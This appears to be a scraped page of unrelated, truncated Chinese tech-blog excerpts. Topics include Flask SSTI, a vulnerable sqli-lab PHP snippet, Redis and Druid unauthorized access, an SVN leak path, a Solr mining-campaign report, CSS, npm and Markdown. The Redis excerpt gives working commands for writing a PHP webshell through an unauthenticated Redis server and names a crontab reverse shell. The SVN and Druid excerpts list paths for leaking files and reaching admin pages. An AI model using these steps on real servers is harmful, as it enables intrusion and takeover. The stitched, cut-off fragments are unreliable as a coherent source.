Flask SSTI利用方式的探索 一.SSTI简介&环境搭建 ​ 一个统一风格的站点,其大多数页面样式都是一致的,只是每个页面显示的内容各不相同.要是所有的逻辑都放在前端进行,无疑会影响响应效果和效率,很不现实.把所有的逻辑放在后端,又会导致太过复杂,前轻后重. ​ 模板的诞生是为了将显示与数据分离,让前端工作人员专注表现设计,后台人员注重业务逻辑,同时简化代码的复杂程度.模板技术多种多样,但其本质是将模板文件和数据通过模板引擎生成最终的HTML代码. ​ Flask使用Jinja 2作为模板…

漏洞分析 使用sqli-lab中的lesson-52作为测试目标.关键代码为: error_reporting(0); $id=$_GET['sort']; if(isset($id)) { //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'SORT:'.$id."\n"); fclose($fp); $sql="SELECT…

Github高效搜索方式 文章目录 Github高效搜索方式 0.写在前面 1.常用的搜索功能 1.1 直接搜索 1.2 寻找指定用户|大小的仓库 1.3 搜索仓库 1.4 查找特定star范围的仓库 1.5 查找指定主题 1.6 查找仓库语言 1.7 搜索issue和pull请求 2. 傻瓜式搜索 3.参考 0.写在前面 名词解释 watch:持续接收该仓库的动态更新 fork:复制项目到自己的 Github 仓库中 star:为当前仓库点赞 clone:将本仓库下载至本地 Issue:及时向…

总结一下redis未授权拿shell: redis-cli -h ip >info 查看系统类型 Windows: 1.找网站绝对路径 2.config set dir 绝对路径根路径 config get dir config set dbfilename indexbak.php set webshell "<?php phpinfo();?>" save Linux系统: 第一种:写密钥 第二种:写crotab反弹shell 第三种:找绝对路径写webshell…

之前仅知道svn权限配置不当,会导致敏感信息泄漏,但是一直不知道具体利用方式. 今天测试svn dig时抓包分析才知道: http://www.xxx.com/路径/.svn/text-base/文件名.svn-base 哈哈--…

概述 近日,阿里云安全团队监测到挖矿团伙利用solr dataimport RCE(CVE-2019-0193)作为新的攻击方式对云上主机进行攻击,攻击成功后下载门罗币挖矿程序进行牟利.该团伙使用的恶意脚本与之前报道的“威胁预警 | watchbog挖矿蠕虫升级,利用Bluekeep RDP等多个漏洞蓄势待发”文章所提团伙使用的基本一致,因此基本认为是同一团伙所为. 除此之外,可以合理推测,该团伙一直活跃在寻找新的攻击方式来植入其恶意程序,阿里云安全团队已在第一时间对该利用方式进行了监控,并对该…

Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能存在的一些问题 首先Druid是不存在什么漏洞的. 当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径 /druid/websession.html /system/druid/websession.html /webpage/system/druid/websession.…

一.CSS简介:  w3c(World Wide Web Consortium):万维网联盟,是规定网页标准的一个组织(叫做Web标准) Web标准:是由w3c和其他标准化组织制定的一系列标准的集合,包含有HTML XTHML Javascript DOM CSS等 作用: 在于创建一个统一用于Web表现层的技术标准,以便通过不同的浏览器或终端设备向用户展示信息内容  好处: 1.提高网页浏览速度节约文件尺寸,比传统的web设计方法至少节约50%以上的文件尺寸 2.缩短改版时间将表现(样式/外观…

直接在npm仓库进行安装 npm install kiana-js --save 直接利用用户名和仓库名进行安装 npm install easterCat/kiana-js 也可以在前面加上 github 前缀 npm install github:easterCat/kiana-js 直接通过 git 上项目的地址进行安装 npm install git+https://github.com/easterCat/kiana-js.git 或者以 ssh 的方式 npm install git…

GitHub支持的Markdown语法,简称GFM.相比标准的Markdown(SM)语法,有少数几个区别,并添加了新的功能. 本位参考 GitHub Flavored Markdown 撰写.有兴趣的话可以看原文. 与标准Markdown的区别 对文本中下划线的处理方式不同 标准Markdown语法会把两个下划线 _ 之间的文本转换为斜体.GFM中会忽略这种语法设置.如果需要设置斜体,建议使用 * 实现.注意仅仅是单个下划线的情况下,多个下划线的语法还是正常的.比如下面单词: wow_grea…